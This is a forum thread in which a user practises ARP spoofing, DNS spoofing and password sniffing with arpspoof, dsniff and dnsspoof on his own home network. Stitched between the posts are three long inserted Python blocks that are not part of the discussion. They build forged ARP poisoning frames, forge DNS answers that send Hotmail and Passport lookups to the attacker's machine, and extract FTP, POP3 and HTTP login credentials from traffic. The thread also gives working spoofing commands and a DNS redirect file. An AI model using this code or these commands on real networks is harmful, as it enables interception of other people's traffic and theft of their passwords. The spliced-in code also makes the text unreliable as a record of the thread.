
Thread: ARP Spoofing problem

  1. #1
    Senior Member

    ARP Spoofing problem

    Hi,

    I have a home network, and this is kept together by a Linksys WAG54G-UK v1.2. Now, I've been following Irongeek's (amazing) tut on "A Quick Intro to Sniffers" - but I've encountered a few problems.

    Firstly, I'll explain about my network: I currently have my Windows laptop connected via an Ethernet cable (to make sure Knoppix-STD will be able to access the network; this is the computer I do the spoofing from) to my router, and an iMac G5 connected to the router via wireless. I tried using Ethereal (while on Windows) to detect the packets coming from the Mac as I accessed a website on it, but that didn't work, so I'm guessing this means that it's a switch.

    OK, I then booted up Knoppix-StD on my M$ laptop, and checked that the ethernet connection was working - the internet could be accessed, and I was able to ping the iMac (at 192.168.1.101). So, I then went into terminal and typed "echo 1 > /proc/sys/net/ipv4/ip_forward" as the tut says (this, for those who don't know, enables packet forwarding). My laptop's IP address is 192.168.1.100.

    I then did:
    Code:
    arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
    0:f:b0:1:52:e5 0:12:17:df:56:61 0806 42: arp reply 192.168.1.2 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:12:17:df:56:61 0806 42: arp reply 192.168.1.2 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:12:17:df:56:61 0806 42: arp reply 192.168.1.2 is-at 0:f:b0:1:52:e5
    ...
    These lines kept on being printed! So much for keeping it in one shell! lol

    I then opened up another shell and typed in:
    Code:
    arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null
    0:f:b0:1:52:e5 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 0:f:b0:1:52:e5
    0:f:b0:1:52:e5 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 0:f:b0:1:52:e5
    ...
    These lines also kept being printed...So, I assumed that it was working.

    I then opened up a third shell, and typed in: "dsniff". This returned the standard "Sniffing packets on eth0" (or something similar to that; I forgot to save it), but nothing else came up. I even went onto my Mac and started uploading things to sites via FTP and accessing webmail accounts, but nothing showed up.

    As I thought that was quite odd, I opened up Ethereal, and started capturing packets. (I saved the packet capture file - it can be found on my site here). There are lots of ARP packets, but I received no TCP ones (from the Mac) and I also received some other odd packets. Could someone please tell me what I am doing wrong? I would really appreciate any help! Thanks in advance,

    J_K9

    P.S. For those of you who've looked at the Ethereal packet capture file: 192.168.1.106 is a desktop which sometimes connects via wireless (it has a static IP address), but isn't connected at the moment.

  2. #2
    Jaded Network Admin nebulus200's Avatar
    Don't know for sure, but one thing that I would remind you is that things like Dsniff work, at least partially, on the concept of a gratuitous arp (unrequested). Basically when you use that arpspoof program, what it is doing is basically saying that 192.168.1.2 is-at 0:f:b0:1:52:e5...

    Normally with arp, what would happen is a system on the local network would ask: Who has 192.168.1.2? Under normal situations, 192.168.1.2 would reply with something similar as above but with its correct MAC address. The reason this arp is gratuitous is that nobody asked who 192.168.1.2 was...now...why is this important? Because many systems, even if they didn't ask the question, will observe the ARP response and cache it...so what you are hoping with the arpspoof is that whatever NIC/system is listening will cache the bad MAC address (your MAC)...so an answer could be that the system you are after is ignoring the gratuitous ARP.

    Anyway, what you are hoping is that the system you are after will think that you really are 192.168.1.2 and will therefore forward the packets to your MAC address, which if you wanted to play nice you would have to make sure you forwarded the packets in turn to the correct address (I wouldn't think you would use IP forwarding for this since they are on different layers of the stack)....anyway...too early in the morning and not enough coffee yet...will revisit to finish the answer if someone hasn't picked up my slack.

  3. #3
    Senior Member
    Hi

    I'll continue. ARP[1], whose spoofing has been well described by Nebulus, connects Layer 2[2] with Layer 3[3]. If you want to exploit the ARP caching, you have to make sure to spoof the correct cache. It seems to me that you are not doing this.

    Code:
    Your machine: 192.168.1.100
    Your iMAC   : 192.168.1.101
    Your Gateway: 192.168.1.1    (<- assumption)
    In order to spoof the correct cache, you would have to

    Code:
    arpspoof -t 192.168.1.101 192.168.1.1 >/dev/null &
    arpspoof -t 192.168.1.1 192.168.1.101 >/dev/null &
    if I remember the command line options of arpspoof correctly. Anyway, you get the idea. This is all well documented.

    Note also the different position of "&", which will solve your problem of having the lines printed.

    Cheers.


    [1] http://www.faqs.org/rfcs/rfc826.html
    [2] http://www.tcpipguide.com/free/t_Dat...ayerLayer2.htm
    [3] http://www.tcpipguide.com/free/t_NetworkLayerLayer3.htm
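The point made in the two replies above, that the victim and the gateway each hold their own ARP cache and that both caches must be fed a forged "X is-at attacker" reply addressed to that host's real MAC, is easier to see with the frames spelled out. The block below is an added example, not code from this thread or from the dsniff package: it builds the 42-byte Ethernet+ARP reply that `arpspoof -t <target> <host>` keeps re-sending, prints it in the same shape as the lines pasted in post #1, and runs a toy model of a host's ARP cache under three acceptance policies (cache any reply, update existing entries only, accept only answered requests). The attacker MAC and the router MAC are the ones visible in the first post's output; the iMac's MAC is invented. Note that a reply whose destination MAC is all zeros, as in the second arpspoof run above, is addressed to no host at all.

```python
"""Forged ARP replies (what arpspoof sends) and a toy model of how a victim's
ARP cache reacts. Added example, not code from the thread or from dsniff."""
import ipaddress
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    """Accepts tcpdump/arpspoof style unpadded octets, e.g. '0:f:b0:1:52:e5'."""
    octets = [int(o, 16) for o in mac.split(":")]
    if len(octets) != 6 or not all(0 <= o <= 255 for o in octets):
        raise ValueError(f"bad MAC address {mac!r}")
    return bytes(octets)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet header + ARP reply 'sender_ip is-at sender_mac', unicast to target."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # htype, ptype, hlen, plen, op
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp                                          # 14 + 28 = 42 bytes


def parse_arp(frame):
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not ARP for IPv4 over Ethernet")
    return {"dst": mac_str(frame[0:6]), "src": mac_str(frame[6:12]), "op": op,
            "sender_mac": mac_str(frame[22:28]),
            "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
            "target_mac": mac_str(frame[32:38]),
            "target_ip": str(ipaddress.IPv4Address(frame[38:42]))}


def describe(frame):
    """Same shape as the lines arpspoof printed in the thread."""
    p = parse_arp(frame)
    return (f"{p['src']} {p['dst']} 0806 {len(frame)}: "
            f"arp reply {p['sender_ip']} is-at {p['sender_mac']}")


class ArpCache:
    """One host's cache. 'unsolicited' caches any reply it is handed (the
    behaviour the poisoning relies on), 'update-only' rewrites entries it
    already holds, 'strict' accepts only replies to its own requests."""

    def __init__(self, my_mac, policy="unsolicited"):
        self.my_mac = mac_str(mac_bytes(my_mac))
        self.policy = policy
        self.table = {}
        self.asked = set()

    def ask(self, ip):
        self.asked.add(ip)

    def receive(self, frame):
        p = parse_arp(frame)
        if p["dst"] not in (self.my_mac, BROADCAST) or p["op"] != ARP_REPLY:
            return False                      # a switch would not even deliver it
        ip, mac = p["sender_ip"], p["sender_mac"]
        accept = (ip in self.asked or self.policy == "unsolicited"
                  or (self.policy == "update-only" and ip in self.table))
        if accept:
            self.table[ip] = mac
            self.asked.discard(ip)
        return accept


def poison_pair(attacker_mac, a_ip, a_mac, b_ip, b_mac):
    """The two frames a man-in-the-middle between A and B needs, i.e. what
    `arpspoof -t A B` and `arpspoof -t B A` keep re-sending."""
    to_a = build_arp_reply(attacker_mac, b_ip, a_mac, a_ip)   # tell A: "B is-at attacker"
    to_b = build_arp_reply(attacker_mac, a_ip, b_mac, b_ip)   # tell B: "A is-at attacker"
    return to_a, to_b


def demo():
    attacker = "0:f:b0:1:52:e5"                          # laptop MAC as printed in the thread
    gw_ip, gw_mac = "192.168.1.1", "0:12:17:df:56:61"    # router MAC: frame destination in the thread's output
    imac_ip, imac_mac = "192.168.1.101", "00:11:22:33:44:55"   # iMac MAC is invented
    imac, router = ArpCache(imac_mac), ArpCache(gw_mac)
    imac.table[gw_ip] = mac_str(mac_bytes(gw_mac))       # healthy state before the attack
    router.table[imac_ip] = imac_mac
    to_imac, to_router = poison_pair(attacker, imac_ip, imac_mac, gw_ip, gw_mac)
    imac.receive(to_imac)
    router.receive(to_router)
    return imac.table[gw_ip], router.table[imac_ip]      # both now point at the attacker


if __name__ == "__main__":
    for f in poison_pair("0:f:b0:1:52:e5", "192.168.1.101", "00:11:22:33:44:55",
                         "192.168.1.1", "0:12:17:df:56:61"):
        print(describe(f))
    print(demo())
```

Once both caches hold the attacker's MAC for the other side, every IP packet between the iMac and the router is switched to the attacker's port, which is why `ip_forward` has to be on: the kernel then re-sends those packets to the real destination instead of dropping them.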

  4. #4
    Senior Member
    Are you sure the (assuming wireless) router is in bridge mode? Also, make sure you are not using a switched environment.

  5. #5
    Senior Member
    Thank you very much nebulus200 and sec_ware! I haven't yet tried it, but as soon as I get back tonight I will. I now understand what I was doing wrong: by arpspoofing 192.168.1.1 192.168.1.2, I thought I was spoofing every machine in that network range. Thank you sec_ware for pointing out what I was doing wrong! And thanks to both of you for the extra amazing info!

    Dmorgan: Bridge mode? I said in my first post that I'm pretty sure it is a switched environment, but the point of arp spoofing (correct me if I'm wrong) is so that you can "confuse" Machine_A into thinking you're Machine_B, and vice-versa, so what happens is that the packets that are meant to be sent between M_A and M_B are actually sent through me, and then forwarded on to their intended recipients.

    I will check out what you said sec_ware as soon as I get back tonight. Many thanks,

    J_K9

  6. #6
    Senior Member
    OK, here's what I have done so far:

    First of all, I had to set up the network card in Knoppix-STD by running the command "netcardconfig". This enabled DHCP broadcasting, and I was then connected to the network. I am in fact posting this from the "attacking" computer.

    Once again, I enabled IP forwarding in the kernel, and got arpspoof started (even with the & after the /dev/null, the lines were still displayed). I ran arpspoof for the two-way connection, and then began "dsniff" in another aterm shell. Dsniff started up, but it didn't display anything whatsoever, even when I tried accessing Hotmail accounts and stuff from my iMac! So, I looked up the dsniff FAQ, and found out about another program called "dnsspoof".

    I discovered that dnsspoof was able to get Hotmail usernames and passwords, so I decided that I might as well check it out. I made a config file for it, called "text", found in /home/knoppix/Desktop. This is what it contained:
    Code:
    192.168.1.104        *.passport.com
    192.168.1.104        *.hotmail.com
    I then ran the command "dnsspoof" with the following options (results are also shown):
    Code:
    ~$: dnsspoof -i eth0 -f /home/knoppix/Desktop/text
    dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.100]
    192.168.1.101.49376 > 192.168.1.1.53: 8465+ A? www.hotmail.com
    192.168.1.101.49376 > 192.168.1.1.53: 8465+ A? www.hotmail.com
    192.168.1.101.49394 > 192.168.1.1.53: 28935+ A? lc1.bay0.hotmail.passport.com
    192.168.1.101.49394 > 192.168.1.1.53: 28935+ A? lc1.bay0.hotmail.passport.com
    The reason that there is no information under each of the two pairs is because the Hotmail page wouldn't load any further on the iMac! All other pages on the iMac, like google.com, would load in a flash, but I tried loading both hotmail.com (first pair of lines) and also clicking on the Hotmail link on msn.com (last two lines), but the same happened on both of them. Could someone please help me out? Thanks again,

    edit: I now kind of know what was wrong: "ifconfig" revealed that my IP address is 192.168.1.100, so I have now changed "/home/knoppix/Desktop/text" to read "192.168.1.100 blah blah blah". But this is now making things even more difficult: the Hotmail page now loads on the iMac, but I see nothing appearing in the terminal, except for the original lines (that dnsspoof is starting). Thanks!

    J_K9

    P.S. What is the difference between the command "dsniff" and the command "dnsspoof"? I know dsniff is the set of tools that dnsspoof is included in, but what does "dsniff" from the command line do? Does it run all the tools that the Dsniff package brings, whereas dnsspoof just starts the DNS spoofing app? Thanks!

  7. #7
    King Tutorial-ankhamun
    Dsniff is just a sniffer that parses out passwords from common plaintext protocols (it also sometimes grabs hashes off of the wire that you can crack). DNSSpoof, as I understand it, just acts as a false DNS server and when a user requests what IP goes with a host name DNSSpoof returns what you tell it to.

  8. #8
    Senior Member
    Thanks Irongeek for clearing that up! Do you know what's wrong with DNSSpoof though? When I type in the wrong IP address (for my attacking computer) into the file DNSSpoof reads from, I can see that the iMac is trying to access Hotmail (yet in truth the page doesn't even load on the iMac). Then, when I type in the correct IP, I don't see that the iMac is accessing Hotmail, but the page loads perfectly on the iMac!

    Am I doing something wrong? Please help me, because I'm really looking forward to learning more about this! I also have another question though: when you use ARP spoof, I'm guessing that also poisons the ARP tables on the target computers, correct? Thanks again.

    J_K9

  9. #9
    King Tutorial-ankhamun
    I imagine DNSSpoof is returning the IP of the box you are running it on to the client. Since that IP does not really have the webpage on it nothing happens. Just a guess, I've never used DNSSpoof.
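What dnsspoof does with the hosts file in post #6 is mechanical, and the behaviour seen there (the page hangs when the file points at an address nobody answers on) follows directly from it: for every "A?" query it sees on the wire it looks the name up against the file's wildcard patterns, and if one matches it sends the client a response with the same transaction ID and question and a single A record carrying the configured IP, racing the real answer from the gateway. The client then connects to that IP, so a web page only appears if something at that address serves it. The block below is an added example, not dnsspoof's own code: it parses the hosts-file format (IP, whitespace, shell-style pattern, as dnsspoof accepts it), builds a query as a resolver would, and forges the answer. The names and IDs are the ones in post #6's output; the configured IP is the attacker's, as in the edit.

```python
"""dnsspoof-style forged A records: hosts-file matching plus DNS wire format.
Added example; not dnsspoof's own code."""
import fnmatch
import ipaddress
import struct


def parse_hosts_file(text):
    """Parse '<ipv4> <hostname-pattern>' lines (the dnsspoof -f format): '#'
    starts a comment, patterns use shell wildcards, first matching rule wins."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, pattern = line.split()
        ipaddress.IPv4Address(ip)               # raises on a malformed address
        rules.append((pattern.lower(), ip))
    return rules


def lookup(rules, qname):
    """IP of the first rule whose pattern matches the queried name, else None."""
    name = qname.rstrip(".").lower()
    for pattern, ip in rules:
        if fnmatch.fnmatchcase(name, pattern):
            return ip
    return None


def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(msg, off):
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compressed name where a plain one was expected")
        labels.append(msg[off:off + n].decode("ascii"))
        off += n


def build_query(txid, name, qtype=1):
    """Standard recursive query with one question, as a stub resolver sends it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question query")
    name, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": msg[12:off + 4]}


def forge_answer(query, rules, ttl=60):
    """The response that races the real server's: same transaction ID, same
    question, one A record with the configured IP. None if the query is not
    an IN A query or no rule matches (dnsspoof then stays silent)."""
    q = parse_query(query)
    if (q["qtype"], q["qclass"]) != (1, 1):
        return None
    ip = lookup(rules, q["name"])
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)  # response, RD+RA, ANCOUNT=1
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)            # name pointer to offset 12
    return header + q["question"] + rr + ipaddress.IPv4Address(ip).packed


def first_a_record(response):
    """What the victim's resolver will cache: (txid, name, ip) of the first answer."""
    txid = struct.unpack("!H", response[:2])[0]
    name, off = decode_name(response, 12)
    off += 4                                    # skip qtype/qclass of the question
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", response[off + 2:off + 12])
    if rtype != 1 or rdlen != 4:
        raise ValueError("first answer is not an A record")
    return txid, name, str(ipaddress.IPv4Address(response[off + 12:off + 16]))


# Hosts file from post #6 after the edit, with the attacker's own address.
HOSTS = "192.168.1.100        *.passport.com\n192.168.1.100        *.hotmail.com\n"

if __name__ == "__main__":
    rules = parse_hosts_file(HOSTS)
    for txid, name in [(8465, "www.hotmail.com"), (28935, "lc1.bay0.hotmail.passport.com"), (1, "www.google.com")]:
        reply = forge_answer(build_query(txid, name), rules)
        print(name, "->", first_a_record(reply) if reply else "no rule, not answered")
```

Two consequences of this design are worth keeping in mind when testing: the forged reply only wins if it reaches the client before the gateway's genuine one, and the listen filter dnsspoof printed in post #6 (`not src 192.168.1.100`) means it deliberately ignores queries from its own host, so nothing in the attacker's own browser will ever be spoofed.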

  10. #10
    Senior Member
    Oh OK...and do you have any ideas on how I could test Dsniff to see if it works? What I mean is, what should I do on the iMac which *should* show up on dsniff? Thanks again!

    J_K9

    P.S. By plain-text password I'm guessing it can't view passwords when done on HTTPS/SSL, right?
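To answer the question of what would show up in dsniff, it helps to see what it actually does with the bytes once the ARP poisoning has put the iMac's traffic on the attacker's NIC: it picks a decoder by server port and pulls login fields out of protocols that carry them in the clear (FTP and POP3 `USER`/`PASS` lines, HTTP Basic headers, HTTP form posts). The block below is an added example written in that spirit, not dsniff's own code, run over constructed client streams rather than a real capture; the hostnames, addresses and the `jk9:s3cret` login are invented. The port 443 case is the HTTPS caveat: the client's first bytes there are a TLS record, so there is no user name or password to parse and the function returns nothing.

```python
"""Plaintext credential extraction in the spirit of dsniff, run over
constructed streams. Added example, not dsniff's own code."""
import base64
import re
from urllib.parse import parse_qs

USER_FIELDS = ("user", "username", "login", "email", "uid")
PASS_FIELDS = ("pass", "password", "passwd", "pwd")


def creds_from_user_pass(proto, text):
    """FTP and POP3 both log in with 'USER x' then 'PASS y' command lines."""
    found, user = [], None
    for line in text.split("\r\n"):
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "USER":
            user = arg
        elif cmd.upper() == "PASS" and user is not None:
            found.append((proto, user, arg))
            user = None
    return found


def creds_from_http(text):
    """One HTTP request: a Basic auth header and/or a urlencoded login form."""
    found = []
    head, _, body = text.partition("\r\n\r\n")
    m = re.search(r"^Authorization:\s*Basic\s+(\S+)\s*$", head, re.I | re.M)
    if m:
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
            user, _, pw = decoded.partition(":")
            found.append(("http-basic", user, pw))
        except ValueError:
            pass                      # malformed base64: skip, never crash the sniffer
    if head.startswith("POST ") and "application/x-www-form-urlencoded" in head.lower():
        form = {k.lower(): v[0] for k, v in parse_qs(body.strip()).items()}
        user = next((form[k] for k in USER_FIELDS if k in form), None)
        pw = next((form[k] for k in PASS_FIELDS if k in form), None)
        if user is not None and pw is not None:
            found.append(("http-form", user, pw))
    return found


def extract_creds(dst_port, client_payload):
    """Dispatch on the server port the way dsniff's decoders do. Anything on
    443 is TLS record bytes: nothing to parse, which is the HTTPS caveat."""
    text = client_payload.decode("latin-1")     # never raises; keeps bytes 1:1
    if dst_port == 21:
        return creds_from_user_pass("ftp", text)
    if dst_port == 110:
        return creds_from_user_pass("pop", text)
    if dst_port in (80, 8080):
        return creds_from_http(text)
    return []


def sniff(streams):
    """streams: iterable of (src_ip, dst_ip, dst_port, client_bytes).
    Returns dsniff-style records (proto, src, dst, user, password)."""
    records = []
    for src, dst, port, payload in streams:
        for proto, user, pw in extract_creds(port, payload):
            records.append((proto, src, dst, user, pw))
    return records


# Constructed sample streams (not from the thread's capture): the iMac logging
# in to an FTP server, a webmail form post, a Basic-auth intranet page, and the
# start of a TLS ClientHello going to port 443.
SAMPLE_STREAMS = [
    ("192.168.1.101", "203.0.113.10", 21,
     b"USER jk9\r\nPASS s3cret\r\nSYST\r\n"),
    ("192.168.1.101", "203.0.113.20", 80,
     b"POST /login HTTP/1.1\r\nHost: webmail.example\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 25\r\n\r\n"
     b"login=jk9&password=s3cret"),
    ("192.168.1.101", "203.0.113.30", 80,
     b"GET /private/ HTTP/1.1\r\nHost: intranet.example\r\n"
     b"Authorization: Basic " + base64.b64encode(b"jk9:s3cret") + b"\r\n\r\n"),
    ("192.168.1.101", "203.0.113.40", 443,
     b"\x16\x03\x01\x00\x2f\x01\x00\x00\x2b\x03\x03" + bytes(32)),
]

if __name__ == "__main__":
    for rec in sniff(SAMPLE_STREAMS):
        print("%-10s %s -> %s  %s / %s" % rec)
```

So the simplest positive test from the iMac is a login to a plain FTP or POP3 server, or a form login on a plain http:// page; a webmail site that logs in over HTTPS will produce the connection but nothing readable inside it. None of this is seen at all unless the poisoning is holding, so if dsniff stays quiet it is worth checking the iMac's ARP table first.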
